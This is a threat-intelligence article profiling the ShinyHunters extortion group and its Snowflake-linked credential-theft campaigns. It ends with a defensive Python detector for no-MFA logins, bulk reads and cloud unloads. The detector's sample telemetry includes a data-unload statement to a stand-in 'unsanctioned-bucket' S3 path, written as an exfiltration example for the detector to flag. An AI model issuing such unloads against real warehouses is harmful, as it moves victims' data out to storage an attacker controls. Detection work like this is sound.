TI News Feed · Threat Intelligence Guides

ShinyHunters (Bling Libra): Threat Actor Profile

ShinyHunters is a data-theft-first actor that graduated from database trading to broad extortion, driving the Snowflake breach wave that hit Ticketmaster, Santander, and others. A full threat-actor profile.

Reviewed & fact-checked against primary sources by the TI News Feed Editorial Team. See our editorial & corrections policy.

ShinyHunters is one of the clearest examples of a data-theft-first threat actor graduating from credential and database trading into broad extortion. Public reporting links the name to major database breaches, Salesforce-linked intrusions, and the large Snowflake customer wave that hit Ticketmaster, Santander, and others.

ShinyHunters: at a glance

  • Aliases: ShinyHunters, Bling Libra, UNC6040
  • Country / affiliation: International cybercrime; loose transnational ecosystem rather than a single state sponsor
  • Assessed status (as of July 2026): Likely active
  • Primary objectives: Data theft, resale, extortion, credential abuse, and database exposure
  • Financial destruction / gain: No single clean public payout total; damage is real but hard to normalize into a payment figure
  • Type: Data-theft and extortion crew (SaaS/cloud)

Who is ShinyHunters?

The challenge in profiling the group is that public financial accounting is weak compared with ransomware groups: the damage is very real, but hard to normalize into a clean payment figure. The most defensible 2026 call is 'likely active,' with an incomplete public picture.

Aliases and attribution

ShinyHunters is a cybercriminal group placed by public reporting in a loose transnational ecosystem rather than under a single state sponsor, tracked as Bling Libra (Palo Alto Unit 42) and UNC6040 (Mandiant). It has reportedly overlapped or collaborated with Scattered Spider in 2025 Salesforce-focused campaigns, per Obsidian Security, a reminder that attribution in the cybercrime ecosystem is fluid.

Financial impact and damage

There is no single clean payout total, but the volume of breach records ShinyHunters has leaked is staggering. The 2024 Snowflake-linked wave reportedly affected around 165 customer accounts, including major breaches such as Ticketmaster (560M records) and a large telecom. Its model, stealing data with stolen credentials and then extorting victims or reselling on cybercrime forums, makes it a persistent SaaS/cloud data-theft threat.

ShinyHunters timeline

  • 2020: Credential and database-theft notoriety on cybercrime forums
  • 2024: Snowflake-linked customer compromises publicized (Ticketmaster, Santander, AT&T)
  • 2025: Google-linked warning reporting and Salesforce-focused campaigns keep the group current

Notable attacks and campaigns

The 2024 Snowflake campaign exploited customer accounts that lacked multi-factor authentication, using credentials harvested by infostealer malware to export vast databases — one of the largest data-theft waves on record. ShinyHunters then extorted victims and listed stolen data for sale, blurring the line between breach broker and extortion crew.

Tactics, techniques, and procedures (TTPs)

The techniques below are compact, high-confidence mappings to the MITRE ATT&CK framework, drawn from the group's MITRE ATT&CK profile and corroborating government and vendor reporting. The live ATT&CK matrix remains the authoritative reference for full coverage.

  • T1078 — Valid Accounts: The Snowflake wave used stolen or plaintext credentials, often infostealer-derived. Require MFA everywhere, rotate service credentials, and invalidate legacy plaintext secrets.
  • T1555 — Credentials from Password Stores (infostealer theft, including contractor environments): Reporting links the campaign to infostealer-derived access and contractor compromise. Hunt for infostealer artifacts and unusual contractor privilege chains.
  • T1530 / T1567 — Data from Cloud Storage / Exfiltration to Web Services: Snowflake intrusions were large-scale data-extraction operations. Monitor bulk export jobs, unusual warehouse queries, and outbound archive transfer to unsanctioned storage.

Detection and defense against ShinyHunters

ShinyHunters relies almost entirely on stolen credentials against MFA-less cloud accounts, so identity is the whole game:

  • Require MFA on every SaaS and cloud data platform — the Snowflake wave hit accounts without it.
  • Rotate service credentials and invalidate legacy plaintext secrets in Jira, code repos, and configs.
  • Hunt for infostealer artifacts and browser-secret theft on endpoints and contractor hosts.
  • Monitor bulk export jobs, unusual warehouse queries, and mass download behavior.
  • Alert on outbound archive transfer to unsanctioned cloud storage and leak-site prep indicators.
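The TTP mappings (T1078, T1530/T1567) and the defense checklist above describe the same three signals: a login without MFA, a bulk read, and an unload to storage the organization does not control. As an added example (not code from TI News Feed, Snowflake, or any vendor), the Python below runs those checks over constructed, Snowflake-style login and query records and then correlates them per user. The field names, the per-user IP and warehouse baselines, the sanctioned-stage allowlist, and the bulk-row threshold are all assumptions for illustration; they are not the real ACCOUNT_USAGE schema.

```python
"""Added example: triage pass over constructed Snowflake-style telemetry.
Field names, baselines and thresholds are assumptions, not the real
ACCOUNT_USAGE schema."""
import re

# --- constructed sample telemetry (not from any real incident) -------------
LOGINS = [  # one row per authentication event; "mfa" = second factor used
    {"ts": "2024-05-20T02:00:00Z", "user": "etl_svc", "ip": "10.0.0.5", "mfa": False},
    {"ts": "2024-05-20T09:00:00Z", "user": "analyst1", "ip": "192.0.2.10", "mfa": True},
    {"ts": "2024-05-21T03:14:00Z", "user": "etl_svc", "ip": "198.51.100.77", "mfa": False},
]
QUERIES = [  # one row per statement; "rows" = rows produced or unloaded
    {"user": "analyst1", "warehouse": "BI_WH", "rows": 1,
     "text": "SELECT count(*) FROM orders"},
    {"user": "etl_svc", "warehouse": "ETL_WH", "rows": 2_000,
     "text": "COPY INTO staging FROM @corp_stage/2024/"},   # a load, not an unload
    {"user": "etl_svc", "warehouse": "BI_WH", "rows": 50_000_000,
     "text": "COPY INTO 's3://unsanctioned-bucket/dump/' FROM customers FILE_FORMAT=(TYPE=CSV)"},
    {"user": "etl_svc", "warehouse": "ETL_WH", "rows": 50_000_000,
     "text": "SELECT * FROM customers"},
    {"user": "etl_svc", "warehouse": "ETL_WH", "rows": 5_000_000,
     "text": "COPY INTO 's3://corp-data-lake/nightly/' FROM orders"},  # sanctioned unload
]
# Assumed baselines an organization would derive from its own history.
BASELINE_IPS = {"etl_svc": {"10.0.0.5"}, "analyst1": {"192.0.2.10"}}
BASELINE_WAREHOUSES = {"etl_svc": {"ETL_WH"}, "analyst1": {"BI_WH"}}
SANCTIONED_STAGES = ("s3://corp-data-lake/",)   # allowlisted unload prefixes
BULK_ROWS = 1_000_000                            # "bulk read" threshold

# COPY INTO <'url'|@stage> ... is an unload; COPY INTO <table> ... is a load.
UNLOAD_RE = re.compile(r"^\s*COPY\s+INTO\s+(?:'([^']+)'|(@\S+))", re.IGNORECASE)


def unload_target(sql):
    """Return the destination of a COPY INTO unload, or None for loads into
    tables and for any other statement."""
    m = UNLOAD_RE.match(sql)
    return (m.group(1) or m.group(2)) if m else None


def check_logins(logins, baseline_ips):
    """T1078: every login without a second factor is a finding; one from an
    IP outside the user's baseline is the high-severity case."""
    alerts = []
    for ev in logins:
        if ev["mfa"]:
            continue
        known = ev["ip"] in baseline_ips.get(ev["user"], set())
        alerts.append({
            "technique": "T1078",
            "severity": "medium" if known else "high",
            "user": ev["user"],
            "detail": f"login without MFA from {ev['ip']}"
                      + ("" if known else " (IP not in baseline)"),
        })
    return alerts


def check_queries(queries, baseline_wh, sanctioned_prefixes, bulk_rows):
    """T1567 for unloads to non-allowlisted storage, T1530 for bulk reads,
    and a T1078 note when a user touches a warehouse it never used before."""
    alerts = []
    for q in queries:
        user, target = q["user"], unload_target(q["text"])
        if target is not None:
            if not target.startswith(sanctioned_prefixes):
                alerts.append({"technique": "T1567", "severity": "high", "user": user,
                               "detail": f"unload to unsanctioned destination {target}"})
        elif q["rows"] >= bulk_rows:
            alerts.append({"technique": "T1530", "severity": "high", "user": user,
                           "detail": f"bulk read of {q['rows']:,} rows on {q['warehouse']}"})
        if q["warehouse"] not in baseline_wh.get(user, set()):
            alerts.append({"technique": "T1078", "severity": "medium", "user": user,
                           "detail": f"first use of warehouse {q['warehouse']}"})
    return alerts


def users_matching_pattern(alerts):
    """Users with both an identity signal (T1078) and an export signal
    (T1530/T1567): the credential-then-exfiltrate chain the profile describes."""
    identity = {a["user"] for a in alerts if a["technique"] == "T1078"}
    export = {a["user"] for a in alerts if a["technique"] in ("T1530", "T1567")}
    return sorted(identity & export)


if __name__ == "__main__":
    found = (check_logins(LOGINS, BASELINE_IPS)
             + check_queries(QUERIES, BASELINE_WAREHOUSES, SANCTIONED_STAGES, BULK_ROWS))
    for a in found:
        print(f"[{a['severity']:6}] {a['technique']} {a['user']}: {a['detail']}")
    print("credential-then-export pattern:", users_matching_pattern(found))
```

Two design points carry over to a real deployment: loads (`COPY INTO <table>`) and allowlisted unloads are deliberately not alerted, so the export rule stays quiet on routine ETL, and the per-user correlation is what lifts a no-MFA login from hygiene noise to an incident lead.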

The bottom line

ShinyHunters shows how stolen credentials plus MFA-less cloud platforms can produce record-breaking breaches without any malware — making identity hygiene the decisive defense. See how ShinyHunters ranks among the most dangerous threat actors, and track its latest activity on our live threat intelligence feed, aggregated from dozens of authoritative sources.

Frequently asked questions

Who is ShinyHunters?

ShinyHunters is an international cybercrime group, also tracked as Bling Libra and UNC6040, specializing in stealing and reselling large databases from SaaS and cloud platforms, and behind the 2024 Snowflake breach wave.

What was the Snowflake breach?

In 2024, ShinyHunters used stolen credentials (often infostealer-derived) to access around 165 Snowflake customer accounts lacking MFA, exfiltrating huge databases including Ticketmaster and Santander data.

How does ShinyHunters make money?

By stealing data with compromised credentials, then extorting victims and reselling the stolen databases on cybercrime forums. Its financial totals are harder to quantify than ransomware ransoms.

Is ShinyHunters still active?

Likely yes. Reporting through 2025, including Salesforce-focused campaigns and Google warnings, indicates continued activity, though the public picture is incomplete.

Primary sources & further reading

This guide is reviewed and fact-checked against authoritative primary sources: